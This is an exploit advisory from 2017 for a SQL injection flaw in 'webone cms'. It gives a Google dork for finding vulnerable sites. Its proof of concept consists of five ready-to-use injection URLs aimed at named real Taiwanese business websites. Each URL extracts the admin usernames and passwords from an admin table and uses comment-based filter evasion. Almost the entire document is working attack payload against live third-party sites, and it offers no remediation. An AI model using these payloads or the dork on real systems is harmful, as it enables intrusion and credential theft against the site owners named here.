>>>> {in the name of god} <<<<
*-------------------------------------------|
exploit title:webone cms sql injection vulnerability
date: Monday, May 15, 2017
author: Ashiyane digital security team
vendor homepage : Http://webone.com.tw/
cwe : Cwe-89
risk level : High
category: Web application
tested on : Windows 10 / chrome
*-------------------------------------------|
*-------------|
google dork : "inurl:/news_con.php?lang="
*-------------|
*-------------------------------------------|
Proof of Concept (POC) :
Http://www.glorytex.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
Http://joylife-taiwan.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
Http://www.winnienet.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
Http://www.bosslin101.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
Http://www.abilities.com.tw/news_con.php?lang=zh&pk=-8%27%20and%20@x:=(select%20/*!50000group_concat(/*!50000ac,0x3a,pw)*/%20from%20admintbl)%20/*!50000union*/%20select%201,2,unhex(hex(@x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--+
*-------------------------------------------
*--------------------------*
| discovered by : Hackfans |
*--------------------------*